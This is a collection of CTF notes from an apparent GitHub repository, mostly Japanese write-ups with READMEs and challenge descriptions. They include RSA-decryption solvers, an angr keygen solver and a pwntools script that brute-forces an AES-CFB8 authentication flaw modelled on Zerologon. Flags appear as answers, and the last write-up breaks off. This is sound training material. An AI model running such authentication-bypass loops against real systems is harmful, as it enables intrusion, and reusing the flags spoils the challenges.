"alpha_fraction": 0.37264150381088257, "alphanum_fraction": 0.4811320900917053, "avg_line_length": 17.434782028198242, "blob_id": "2d51a9f4adf7a6e604cd1a0e9acfe0abcd89e208", "content_id": "a5965efb880c54e9731b745b933511d5dee3dd7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 424, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/2021/Google_Capture_The_Flag_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Google Capture The Flag 2021\n\n* https://g.co/ctf\n\n * https://github.com/google/google-ctf/tree/master/2021\n\n* 2021/07/17 09:00 JST - 2021/07/19 08:59 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ---- | ---------------------- | ------- | ----: | -----: |\n| Misc | [FILESTORE](FILESTORE) | | 50 | 321 |\n\n---\n\n## Result\n\n* 50 points\n\n* 309 / 379 (> 1 pt)\n" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7983871102333069, "avg_line_length": 23.799999237060547, "blob_id": "2ae37ade18243b325bdf6f47db98251c9549b1cc", "content_id": "3f11e2cfbd4b0ae014c18098b53821f3890d5b95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 134, "license_type": "no_license", "max_line_length": 97, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Extra/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "いつものRSA?\n\n[cry-extra.zip](https://score.wanictf.org/storage/xr6tsfdcy5xzk66juyjtrpd66nq2kxqj/cry-extra.zip)\n\nWriter : Laika\n" }, { "alpha_fraction": 0.5839999914169312, "alphanum_fraction": 0.7680000066757202, "avg_line_length": 24, "blob_id": "0cdc5af134170ea5d0ca86c16d3dd80b9d72a704", "content_id": "4052abc21067a661ee22be776d374dd2dac2a537", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 125, "license_type": "no_license", "max_line_length": 79, "num_lines": 5, "path": "/2021/UIUCTF_2021/hvhpgs{synt}/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "CS1 ciphers go brrrrr\n\n**author**: spamakin\n\n[chal](https://uiuc.tf/files/7702cafa765d3b0197d7b9a084393d40/chal?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjM5fQ.YQavQQ.xXLhI1PhFQc04UUOIQCgzqfjT80)\n" }, { "alpha_fraction": 0.2665782570838928, "alphanum_fraction": 0.3395225405693054, "avg_line_length": 49.266666412353516, "blob_id": "4254deceefe8ff6dbc75e6f68913d6ed4c964b4d", "content_id": "0153265052c153e00367fc0c112c0493454965fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 110, "num_lines": 30, "path": "/2021/redpwnCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# redpwnCTF 2021\n\n* https://ctf.redpwn.net/\n\n* 2021/07/10 04:00 JST — 2021/07/13 04:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------------------------------------------------------- | ------------ | ----: | -----: |\n| Crypto | [baby](baby) | RSA | 102 | 827 |\n| Pwn | [beginner-generic-pwn-number-0](beginner-generic-pwn-number-0) | BOF | 105 | 485 |\n| Misc | [compliant-lattice-feline](compliant-lattice-feline) | netcat | 102 | 1094 |\n| Web | [inspect-me](inspect-me) | Devtools | 101 | 1291 |\n| Web | [orm-bad](orm-bad) | SQLi | 102 | 1019 |\n| Web | [pastebin-1](pastebin-1) | XSS | 103 | 612 |\n| Crypto | [round-the-bases](round-the-bases) | binary | 107 | 348 |\n| Crypto | [scissor](scissor) | ROT | 132 | 1005 |\n| web | [secure](secure) | SQLi, Base64 | 104 | 535 |\n| Reversing | [wstrings](wstrings) | Ghidra | 102 | 844 |\n\n---\n\n## Result\n\n* 1032 points\n\n* 391 / 1418 (> 1 pt)\n" }, { "alpha_fraction": 0.5858895778656006, "alphanum_fraction": 0.7822085618972778, "avg_line_length": 45.57143020629883, "blob_id": "822ad1d1875d956173d6f7ebb2a8c93f9a765934", "content_id": "3b65a8738dabe4cfec4acb3f89040cf8b7d84d28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 326, "license_type": "no_license", "max_line_length": 112, "num_lines": 7, "path": "/2021/RaRCTF_2021/minigen/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A stream cipher in only 122 bytes!\n\nNote: This has been tested on python versions `3.8` and `3.9`\n\n[minigen.py - 6d973f](https://files-ctf.rars.win/challenge-files/42/6d973fab76597c26bac5c54853670c85/minigen.py)\n\n[output.txt - 93113f](https://files-ctf.rars.win/challenge-files/42/93113f7bc2570a09052a5da3c4919f2a/output.txt)\n" }, { "alpha_fraction": 0.5644699335098267, "alphanum_fraction": 0.6026743054389954, "avg_line_length": 19.54901885986328, "blob_id": "34625875095a8056393aa7e57757892ed4281834", "content_id": "66feda8c56c5395c2628b3b8f7da893fc5634856", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 76, "num_lines": 51, "path": "/2020/SunshineCTF/Password_Pandemonium/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n指定のURLに移動するとSign upが求められる。\n\n![](img/2020-11-08-02-26-28.png)\n\nいろいろ試すと、パスワードの条件が厳しいことがわかる。\n\n* `a`\n * Password is too short.\n * 8文字以上にする\n\n* `aaaaaaaa`\n * Password must include more than two special characters.\n * 2つ以上の特殊文字を入れる\n\n* `aaaa////`\n * Password must include a prime amount of numbers.\n * 素数個の数字を入れる\n\n* `aaaa////123`\n * Password must have equal amount of uppercase and lowercase characters.\n * 大文字と小文字の数を一致させる\n\n* `aaAA////123`\n * Password must include an emoji.\n * 絵文字を入れる\n\n* `aaAA////123⭐`\n * Password's MD5 hash must start with a number\n * MD5にしたとき数字から始まるようにする\n\n* `123AAaa////⭐`\n * Password must be valid JavaScript that evaluates to True.\n * javascriptでTrueと評価される値にする\n\n* `'123AAaa'!='⭐'`\n * Password must be a palindrome.\n * 回文にする\n\n* `'⭐'=='⭐'||'aA'*1==1*'Aa'||'⭐'=='⭐'`\n * Password is too long.\n * 短くする\n\n* `'⭐'=='⭐'||aA*1==1*Aa||'⭐'=='⭐'`\n\n⇒ 成功\n\nJavascriptの条件が厄介だったので、https://playcode.io/ で確認しながら操作\n\n<!-- sun{Pal1ndr0m1c_EcMaScRiPt} -->" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7939394116401672, "avg_line_length": 54, "blob_id": "d35c1e0cbe7a0565f0aaabc9901eadf89d28b3d7", "content_id": "13f92bcfa47a4c1b1f8a0dd5d1fd8ab403cc47fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 165, "license_type": "no_license", "max_line_length": 97, "num_lines": 3, "path": "/2021/dCTF_2021/Julius_ancient_script/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I found this Ancient Roman papyrus. Could you decypher it for me?\n\n[flag.txt](https://dctf.dragonsec.si/files/224c4c15f483fed5fe08a81412f594c2/flag.txt?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTc2fQ.YJ64eQ.FA3cqD3_JeC90Nw7XIhxeZsY-gw)\n" }, { "alpha_fraction": 0.3632218837738037, "alphanum_fraction": 0.6816109418869019, "avg_line_length": 23.830188751220703, "blob_id": "af690398235f59d91fecf6195a1b4fa755510e3c", "content_id": "5cc78fb8c46259879fe23c11a834760daa8ea931", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 95, "num_lines": 53, "path": "/2021/BCACTF_2.0/RSAtrix_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムと出力結果が与えられる。\n\n```py\np = 94653748632775872562206813156858988240379536044871601072940225022186828970998253\nq = 47982815420210848939631963090916124891858755590019708758250635504732488148835047\nn = p * q\ne = 3\nN = 23\n\nR = Zmod(n)\nMS = MatrixSpace(R, N, N)\ns = PermutationGroupElement('(1,6,8)(2,3,4,5,7)(9,11,13,15,17,19,21,23)(10,12,14,16,18,20,22)')\nP = MS(s.matrix())\nwith seed(1): C = MS([randrange(100) for i in range(N*N)])\nG = C * P * C^-1\n\ndef encrypt(m):\n\tM = m * G\n\treturn (M^e).list()\n```\n\n行列`C`がランダムに見えるが、シード値が固定なので`G`が一意に計算できる。\n\n`M^e = m^e * G^e`であるので、`M^e * G^-e`を計算すると、`m^e * I (I:単位行列)`が求められる。\n\n`m^e`が分かればRSA暗号の復号化をするだけである。\n\n```py\n# sage\nfrom Crypto.Util.number import *\n\np = 94653748632775872562206813156858988240379536044871601072940225022186828970998253\nq = 47982815420210848939631963090916124891858755590019708758250635504732488148835047\nn = p * q\ne = 3\nN = 23\n\nR = Zmod(n)\nMS = MatrixSpace(R, N, N)\ns = PermutationGroupElement('(1,6,8)(2,3,4,5,7)(9,11,13,15,17,19,21,23)(10,12,14,16,18,20,22)')\nP = MS(s.matrix())\nwith seed(1): C = MS([randrange(100) for i in range(N*N)])\nG = C * P * C^-1\n\nM = MS(eval(open('enc.txt','r').read())) * (G^-e)\n\nd = power_mod(e,-1,(p-1)*(q-1))\nprint(long_to_bytes(power_mod(M[0][0],d,n)))\n```\n\n<!-- bcactf{permutation-conjugation-magic-3x876oeu} -->\n" }, { "alpha_fraction": 0.7524271607398987, "alphanum_fraction": 0.7864077687263489, "avg_line_length": 21.88888931274414, "blob_id": "0f9796cec763698940bc7873d18a0c54a4ce84f9", "content_id": "c0f7ed33e75fdc00fcfcaf08860b02a83cee92d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 117, "num_lines": 9, "path": "/2021/WaniCTF21-spring/secure_document/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "本日の資料は以下を入力して圧縮しました。\n\n```\nthe password for today is nani\n```\n\n[for-secure-document.zip](https://score.wanictf.org/storage/nr6n608qbm5ebot5m5nslupzwnfldvvu/for-secure-document.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.721238911151886, "alphanum_fraction": 0.7566371560096741, "avg_line_length": 24.22222137451172, "blob_id": "9d495a84736ce547193db2e8c7946b6bc08c586c", "content_id": "074250a7bc218b79fe15c482a19df324fa6cdefe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 84, "num_lines": 9, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Similar to wasm protected site 1, but this time there is no password, only the flag.\n\nEnter the flag, and the program will check it for you\n\nhttp://web.bcactf.com:49158/\n\nHint 1 of 1\n\nWhat does the wasm do to compare each byte" }, { "alpha_fraction": 0.2818532884120941, "alphanum_fraction": 0.3474903404712677, "avg_line_length": 25.827587127685547, "blob_id": "1d28fa23203713d1a4735b42fe58c47b85aa8631", "content_id": "529ed9e558282a0aa21d6849b0d705d532b71662", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 779, "license_type": "no_license", "max_line_length": 103, "num_lines": 29, "path": "/2020/SquareCTF2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Square CTF 2020\n\n* https://2020.squarectf.com/\n\n* 2020/11/14 07:00 JST — 2020/11/15 07:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | ---------------------------------------------------- | ------------------ | ----: | -----: |\n| Crypto | [Oh_Sheet](Oh_Sheet) | google spreadsheet | 200 | 95 |\n| | [Hash_My_Awesome_Commands](Hash_My_Awesome_Commands) | timing attack | 150 | 51 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------------ | ---------------------- | -------------------- | ----: | -----: |\n\n---\n\n## Result\n\n* 351 points\n\n* 66 / 610 (> 1 pt)" }, { "alpha_fraction": 0.716312050819397, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 22.66666603088379, "blob_id": "576d46be7c3fe4011499bec67272f9341043b059", "content_id": "4162e0d8beed2590a5b07dca99468e11814497dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 89, "num_lines": 6, "path": "/2020/WaniCTF/l0g0n/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "🕵️‍♂️\n`nc l0g0n.wanictf.org 50002`\n\n[server.py](https://score.wanictf.org/storage/paszoeecwmnzumadajpmjqatzqejiras/server.py)\n\nWriter : Laika" }, { "alpha_fraction": 0.6415094137191772, "alphanum_fraction": 0.7672955989837646, "avg_line_length": 21.85714340209961, "blob_id": "24e64f2604d127be6d326c0e476cdc6407490e71", "content_id": "fbb49037cec31049ef77684ab771959f702e50d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 159, "license_type": "no_license", "max_line_length": 99, "num_lines": 7, "path": "/2021/RITSEC_CTF_2021/lorem_ipsum/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "![](img/hint.jpg)\n\nFlag is case sensitive.\n\nauthor: raydan\n\n[cipher.txt](https://ctf.ritsec.club/files/152105ec4b3c4d447fac627d3d80b57d/cipher.txt?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6NDR9.YHKqLw.v7DaccC1CEtAnbLV6Ej2gH96PU0)" }, { "alpha_fraction": 0.7318295836448669, "alphanum_fraction": 0.7518796920776367, "avg_line_length": 43.44444274902344, "blob_id": "cd56f0218e5ab34935e107998f725e2cbad7f5d7", "content_id": "8872c49a373193dcf8aa7bd4e2b907c9706304d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 399, "license_type": "no_license", "max_line_length": 210, "num_lines": 9, "path": "/2021/BCACTF_2.0/RSAtrix_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "RSA, RSA, RSA. After so many RSA problems, they all start to look the same. But what looks different? Matrices! After a lot of detailed R&D, we're proud to present RSAtrix, the world's first* matrix RSA system!\n\n[rt1.sage](https://objects.bcactf.com/bcactf2/rsatrix-1/rt1.sage)\n\n[enc.txt](https://objects.bcactf.com/bcactf2/rsatrix-1/enc.txt)\n\nHint 1 of 1\n\nHow do you decode messages encoded in RSA?" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6780626773834229, "avg_line_length": 42.875, "blob_id": "44b2b0ad86362be93d918c8949fc8929b030b3d9", "content_id": "3b40e0fabe3875d11742896f6d457ff11114fdde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 351, "license_type": "no_license", "max_line_length": 72, "num_lines": 8, "path": "/2021/WeCTF_2021/Include/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Yet another buggy PHP website. \n \nFlag is at /flag.txt on filesystem\n\nHost 1 (San Francisco): [include.sf.ctf.so](http://include.sf.ctf.so/) \nHost 2 (Los Angeles): [include.la.ctf.so](http://include.la.ctf.so/) \nHost 3 (New York): [include.ny.ctf.so](http://include.ny.ctf.so/) \nHost 4 (Singapore): [include.sg.ctf.so](http://include.sg.ctf.so/)\n" }, { "alpha_fraction": 0.5967633128166199, "alphanum_fraction": 0.6527309417724609, "avg_line_length": 21.830768585205078, "blob_id": "e79e182598252597b4c84d8b14698b3a756ea7b2", "content_id": "f28f614c74a114bb16b077afdfde27d59104d298", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1719, "license_type": "no_license", "max_line_length": 220, "num_lines": 65, "path": "/2020/KipodAfterFreeCTF/SSE_KEYGENME/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nまず、`file` コマンドで形式を確認する。\n\n```bash\n$ file SSE_KEYGENME \nSSE_KEYGENME: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1e5c1dd325c6f4680a3e72d96aba4b57b0da3211, not stripped\n```\n\nELF形式であることが分かるので、実行してみる。\n\n```bash\n$ ./SSE_KEYGENME \n###############################\n### WELCOME TO SSE_KEYGENME ###\n### ENJOY YOUR STAY ###\n###############################\nEnter key:\n> hey\nWrong key, try again...\n```\n\n`strings`コマンドを実行してみる。\n\n```bash\n$ strings SSE_KEYGENME\n, \"&4More bytes read than expected, exiting...\nInput size not multiple of block length, exiting...\n###############################\n### WELCOME TO SSE_KEYGENME ###\n### ENJOY YOUR STAY ###\nEnter key:\nPlease enter a key.\nSuccess! Enjoy the rest of the competition :)\nWrong key, try again...\n```\n\nとりあえず、正しいkeyを入力できれば先に進めそう。\n\nというわけで、`angr`を使って解く。アドレスはIDAを使って確認した。\n\n![](img/2020-11-07-15-58-28.png)\n\n[参考]\n\n* https://github.com/saru2017/hxp2018-angrme\n\n```py\nimport angr\n\np = angr.Project('SSE_KEYGENME')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0xD48-0xC6D)\n# addr_failed = main_addr + (0xD4F-0xC6D)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))\n```\n\n実行結果がそのままFLAGになっている。\n\n<!-- KAF{F0R_0LD_T1M3S_S4K3} -->" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.7410714030265808, "avg_line_length": 15.470588684082031, "blob_id": "af49604ea3bbd4e39d4b2f38858a9c26650fbf56", "content_id": "b80cdf50173be0c5bd403db9454a661f1beaf146", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 698, "license_type": "no_license", "max_line_length": 43, "num_lines": 34, "path": "/2021/redpwnCTF_2021/baby/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\nn: 228430203128652625114739053365339856393\ne: 65537\nc: 126721104148692049427127809839057445790\n```\n\nRSA暗号で`n`の値が小さいので、素因数分解ができそうなことが分かる。\n\nFactorDBで素因数分解したところ、`p,q`が分かったので復号化する。\n\n```py\nn = 228430203128652625114739053365339856393\ne = 65537\nc = 126721104148692049427127809839057445790\n\nfrom factordb.factordb import FactorDB\nfrom Crypto.Util.number import *\n\nf = FactorDB(n)\nf.connect()\nfactors = f.get_factor_list()\n\n[p, q] = factors\nd = pow(e,-1,(p-1)*(q-1))\nm = pow(c,d,n)\n\nprint(long_to_bytes(m))\n```\n\n<!-- flag{68ab82df34} -->\n" }, { "alpha_fraction": 0.5123595595359802, "alphanum_fraction": 0.5460674166679382, "avg_line_length": 16.799999237060547, "blob_id": "7a1a30d97390d16ca682392ae298f4eb09aef6df", "content_id": "65d768d74768ade464ba3bbe2ab72f6309ca6fd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 445, "license_type": "no_license", "max_line_length": 54, "num_lines": 25, "path": "/2021/WaniCTF21-spring/Extra/cry-extra/encrypt.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import getPrime, bytes_to_long\n\nwith open(\"flag.txt\", \"rb\") as f:\n flag = f.read()\n\np, q = getPrime(1024), getPrime(1024)\nN = p * q\nM = 2 * p + q\ne = 0x10001\n\n\ndef encrypt(plaintext: bytes) -> int:\n plaintext = bytes_to_long(plaintext)\n c = pow(plaintext, e, N)\n\n return c\n\n\nif __name__ == \"__main__\":\n c = encrypt(flag)\n\n print(f\"{N = }\")\n print(f\"{M = }\")\n print(f\"{e = }\")\n print(f\"{c = }\")\n" }, { "alpha_fraction": 0.6208178400993347, "alphanum_fraction": 0.6586121320724487, "avg_line_length": 23.104476928710938, "blob_id": "af4ba29c9f8b3fcfd8989ae8f82a6461f6d38c1e", "content_id": "542d02fafea377672ac627f2eeccca6bdafe1856", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1951, "license_type": "no_license", "max_line_length": 130, "num_lines": 67, "path": "/2020/WaniCTF/l0g0n/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# writeup\n\n```bash\n$ nc l0g0n.wanictf.org 50002\nChallenge (hex) > 53fd\nServer challenge: b69221d059469d35\nCredential (hex) > 5ffa\nAuthentication Failed... 🥺\n```\n\nサーバーサイドのプログラムを読むと、入力する`client_credential`とサーバーで計算する`server_credential`が一致すればよいことがわかる。\n\n```py\nclient_challenge = input(\"Challenge (hex) > \")\n\nclient_credential = input(\"Credential (hex) > \")\n\nserver_credential = cipher.encrypt(client_challenge)\nif client_credential == server_credential:\n print(f\"OK! {flag}\")\n```\n\n肝心の`server_credential`の計算部分だが、計算結果は`plaintext`の長さに依存していることがわかる(★)。そのため、`client_challenge`が1バイトのとき、`server_credential`も1バイトになってしまう。\n\n```py\nclass AES_CFB8:\n def __init__(self, key):\n self.block_size = 16\n self.cipher = AES.new(key, AES.MODE_ECB)\n\n def encrypt(self, plaintext: bytes, iv=bytes(16)):\n iv_plaintext = iv + plaintext\n ciphertext = bytearray()\n\n for i in range(len(plaintext)): # ★\n X = self.cipher.encrypt(iv_plaintext[i : i + self.block_size])[0]\n Y = plaintext[i]\n ciphertext.append(X ^ Y)\n return bytes(ciphertext)\n```\n\nつまり、`client_challenge`を1バイトとしたとき、`server_credential`は`\\x00`~`\\xff`のいずれかになるので、1/256の確率で一致する。\n\n以下を実行してフラグを取得。1/256が引ければ終了。\n\n```py\nfrom pwn import *\n\nconn = remote('l0g0n.wanictf.org',50002)\n\ncnt = 0\nwhile True:\n cnt += 1\n # client_challenge -> server_credential\n conn.sendline('00') # any 1byte\n conn.recvuntil('>')\n # client_credential\n conn.sendline('50') # any 1byte\n conn.recvuntil('>')\n\n msg = str(conn.recvline())\n print(cnt,msg)\n if 'OK' in msg: # 1/256\n break\n\nconn.close()\n```" }, { "alpha_fraction": 0.7360405921936035, "alphanum_fraction": 0.7563451528549194, "avg_line_length": 21, "blob_id": "a659582f51ad25ce2d31c4588a4615c2d8f084d5", "content_id": "6d159f668ce6d25661dbc8b54922d815c3700bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 311, "license_type": "no_license", "max_line_length": 92, "num_lines": 9, "path": "/2021/angstromCTF_2021/Fish/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n画像を`青い空を見上げればいつもそこに白い猫`を使って解析する。\n\nアルファチャンネルを無効化すると以下の画像が得られる。\n\n![](./fish_disable_alpha.png)\n\n<!-- actf{in_the_m0rning_laughing_h4ppy_fish_heads_in_th3_evening_float1ng_in_your_soup} -->" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.8529411554336548, "avg_line_length": 33, "blob_id": "458451a7a4e50277fb86b115b63d4b8aaf031866", "content_id": "69bb30450f396a2c123d23d0b7a6596e843d2b93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 170, "license_type": "no_license", "max_line_length": 119, "num_lines": 5, "path": "/2021/redpwnCTF_2021/wstrings/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Some strings are wider than normal...\n\nDownloads\n\n[wstrings](https://static.redpwn.net/uploads/c3c2ce7829ac7fb904ab02de13b4fbdda69232159c7a5dfa6d7d0fa37606a45d/wstrings)\n" }, { "alpha_fraction": 0.4476190507411957, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 14.142857551574707, "blob_id": "62b7b370c474b93b1a22287198cabd4089589903", "content_id": "35c3d48b2ff0f12e58fac2d87f76ceaedd0d8575", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 105, "license_type": "no_license", "max_line_length": 27, "num_lines": 7, "path": "/2021/UMassCTF_2021/Hermit_Part_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Help henry find a new shell\n\nhttp://104.197.195.221:8086\n\nhttp://34.121.84.161:8086\n\nCreated by Cobchise#6969" }, { "alpha_fraction": 0.2869822382926941, "alphanum_fraction": 0.3589743673801422, "avg_line_length": 31.74193572998047, "blob_id": "6308133a9996f045636b6f77b938a218f3d7ba5d", "content_id": "1c58c72b97d44b9602d4ac457bff6a91c3a706cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1016, "license_type": "no_license", "max_line_length": 88, "num_lines": 31, "path": "/2021/UMassCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# UMassCTF 2021\n\n* https://ctf.umasscybersec.org/\n\n* 2021/03/27 07:00 JST — 2021/03/29 07:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------ | ---------------------- | ----: | -----: |\n| Rev | [easteregg](easteregg) | Ghidra | 50 | 229 |\n| Misc | [ekrpat](ekrpat) | Dvorak, Python sandbox | 322 | 127 |\n| Web | [Hermit Part 1](Hermit_Part_1) | PHP RCE | 50 | 340 |\n| Forensics | [notes](notes) | Volatility | 50 | 214 |\n| Web | [PikCha](PikCha) | --- | 241 | 153 |\n| Misc | [Scan Me](Scan_Me) | GIMP, QR | 128 | 183 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 891 points\n\n* 165 / 660 (> 1 pt)" }, { "alpha_fraction": 0.28412699699401855, "alphanum_fraction": 0.3523809611797333, "avg_line_length": 53.80434799194336, "blob_id": "87f123ac0ffbfd81cc92b2e8f00b5c0a2bfd808b", "content_id": "fd96f2043bbedd03fe72696ad20f63763a918aeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2532, "license_type": "no_license", "max_line_length": 106, "num_lines": 46, "path": "/2020/WaniCTF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# WaniCTF\n\n* https://wanictf.org/\n\n* 2020/11/21 10:00 JST — 2020/11/23 20:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------- | ------------------------------------ | ----: | -----: |\n| Crypto | [Veni, vidi](Veni_vidi) | ROT13 | 101 | 152 |\n| | [exclusive](exclusive) | XOR | 101 | 96 |\n| | [Basic RSA](Basic_RSA) | RSA | 102 | 76 |\n| | [LCG crack](LCG_crack) | LCG(線形合同法) | 105 | 48 |\n| | [l0g0n](l0g0n) | CVE-2020-1472(Zerologon) | 111 | 33 |\n| Forensics | [logged_flag](logged_flag) | key logger | 101 | 126 |\n| | [ALLIGATOR_01](ALLIGATOR_01) | volatility, pstree | 102 | 83 |\n| | [ALLIGATOR_02](ALLIGATOR_02) | volatility, consoles | 102 | 76 |\n| | [chunk_eater](chunk_eater) | PNG chunk | 102 | 71 |\n| | [ALLIGATOR_03](ALLIGATOR_03) | volatility, hashdump | 104 | 58 |\n| | [zero_size_png](zero_size_png) | PNG CRC32, zlib | 107 | 40 |\n| Misc | [Find a Number](Find_a_Number) | binary search | 101 | 111 |\n| | [MQTT Challenge](MQTT_Challenge) | MQTT | 103 | 65 |\n| Web | [DevTools_1](DevTools_1) | devtool | 100 | 163 |\n| | [DevTools_2](DevTools_2) | devtool | 101 | 154 |\n| | [Simple Memo](Simple_Memo) | directory traversal | 101 | 135 |\n| | [striped table](striped_table) | XSS | 101 | 111 |\n| | [SQL Challenge 1](SQL_Challenge_1) | SQL injection w/o spaces | 102 | 71 |\n| | [SQL Challenge 2](SQL_Challenge_2) | SQL injection w/o special characters | 105 | 50 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| --- | ------- | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 1951 points\n\n* 50 / 187 (> 1 pt)" }, { "alpha_fraction": 0.5072312355041504, "alphanum_fraction": 0.687490701675415, "avg_line_length": 39.654544830322266, "blob_id": "dbeb8ea22bc47917fab574486cce541f6378da4f", "content_id": "5762d71a54f5fe0d4516746170cff22b0a1b7340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7227, "license_type": "no_license", "max_line_length": 216, "num_lines": 165, "path": "/2020/SunshineCTF/speedrun-00/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`file`コマンドで形式を調べる。\n\n```bash\n$ file chall_00\nchall_00: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=dadca72eeddf37ba3b9fed1543b8ccdf75cbc78e, not 